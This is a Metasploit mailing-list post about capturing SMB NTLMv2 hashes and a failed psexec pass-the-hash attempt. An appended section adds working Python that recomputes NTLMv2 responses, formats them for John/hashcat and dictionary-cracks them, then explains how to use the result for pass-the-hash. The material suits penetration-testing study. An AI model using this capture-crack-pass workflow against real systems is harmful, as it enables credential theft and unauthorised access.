Metasploit mailing list archives

metasploit auxiliary/server/capture/smb and pass the hash


From: macubergeek <macubergeek () comcast net>
Date: Thu, 5 Apr 2012 04:54:09 -0400

I've been working with the metasploit auxiliary/server/capture/smb module and have had good success capturing smb 
hashes.

[*] Empty hash captured from 192.168.1.1:1981 captured, ignoring ...
[*] 2012-03-30 22:57:24 -0400
NTLMv2 Response Captured from 192.168.1.1:1981
USER:DomainUser DOMAIN:MASSIVE OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB  LM_CLIENT_CHALLENGE:cf4000a12bdec1ad
NTHASH:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD
NT_CLIENT_CHALLENGE:0101000000000000f89c09009812cd01cf4000a12bdec1ad00000000020000000000000000000000

Chris Gates's Carnal Ownage blog suggests cracking the A's with John and guessing at the B's

My questions are:
does the "Empty hash captured" signify that the LM hash was disabled on this box?

Passing the hash
I've tried passing the hash using exploit/windows/smb/psexec configured like so:

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOST      192.168.1.1                                                        yes       The target address
   RPORT      445                                                                yes       Set the SMB service port
   SHARE      ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  MASSIVE                                                            no        The Windows domain to use for authentication
   SMBPass    AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBB:CCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDD  no        The password for the specified username
   SMBUser    DomainUser                                                         no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic

This results in authentication/Login errors.
I realize I can't pass the hash against DomainUser on his box while he's logged in, but does anyone know if I can, say, use a domain admin cred against DomainUser's box? I've tried doing psexec against DomainUser's box after he logged out of the machine and still no go. I'm not sure if pass the hash works here or if I'm using the correct answer for SMBPass.

Jim
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
%49%66%20%79%6F%75%20%63%61%6E%20%72%65%61%64%20%74%68%69%73%20%79%6F%75%20%6E%65%65%64%20%74%6F%20%67%65%74%20%61%20%67%69%72%6C%66%72%69%65%6E%64%2E

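Added example (my code, not from the post or from the Metasploit module): what auxiliary/server/capture/smb records is an NTLMv2 challenge-response, and the Python below computes one exactly as a client does (MS-NLMP: NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain); NTProofStr = HMAC-MD5(NTOWFv2, server challenge || blob)), formats it as the user::domain:challenge:proof:blob line that John's netntlmv2 format and hashcat mode 5600 consume, and runs a dictionary attack on it. Assumptions: the user, domain and NT_CLIENT_CHALLENGE blob are the ones from the capture above; the 8-byte server challenge is taken to be the module's default CHALLENGE value 1122334455667788; the password "Password1" and the wordlist are constructed for the demo. MD4 is implemented inline because hashlib's md4 is frequently unavailable.

```python
"""NTLMv2 challenge-response: compute, format for John/hashcat, crack offline.
Added example following MS-NLMP; sample values are constructed (see comments)."""
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(msg: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); avoids depending on OpenSSL's legacy provider."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    bit_len = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[k] + const) & MASK, shifts[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password. This is the value pass-the-hash needs."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain); only the user name is upper-cased."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, server challenge || blob).
    The capture module prints this 16-byte value as NTHASH and the blob as NT_CLIENT_CHALLENGE."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, "md5").digest()


def john_line(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """NetNTLMv2 line as consumed by John (netntlmv2) and hashcat (mode 5600)."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_netntlmv2(line: str, wordlist):
    """Offline dictionary attack on one captured line; returns the password or None."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal_b, proof_b, blob_b = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal_b, blob_b), proof_b):
            return candidate
    return None


# Sample values: user, domain and blob come from the capture quoted in the post; the server
# challenge is ASSUMED to be the capture module's default CHALLENGE; the password is CONSTRUCTED.
USER, DOMAIN = "DomainUser", "MASSIVE"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = bytes.fromhex("0101000000000000f89c09009812cd01cf4000a12bdec1ad00000000020000000000000000000000")
PASSWORD = "Password1"


def demo():
    """Build the line the module would have logged for PASSWORD, then crack it."""
    proof = ntlmv2_proof(PASSWORD, USER, DOMAIN, SERVER_CHALLENGE, BLOB)
    line = john_line(USER, DOMAIN, SERVER_CHALLENGE, proof, BLOB)
    # Same password, different server challenge: a different proof. The captured response is
    # bound to one challenge, so it is not a reusable credential the way the NT hash is.
    other = ntlmv2_proof(PASSWORD, USER, DOMAIN, bytes.fromhex("8877665544332211"), BLOB)
    found = crack_netntlmv2(line, ["letmein", "Summer2012", PASSWORD])  # constructed wordlist
    return line, proof != other, found


if __name__ == "__main__":
    line, challenge_bound, found = demo()
    print(line)
    print("response changes with challenge:", challenge_bound)
    print("cracked:", found)
```

The NTHASH the module prints is an HMAC over the server challenge, so it differs for every authentication and is not the LM:NT hash pair that psexec's SMBPass expects; the offline route is to crack the logged line (or set JOHNPWFILE on the capture module and run John on the result) and then use the recovered password, or its nt_hash(), for pass-the-hash.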

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
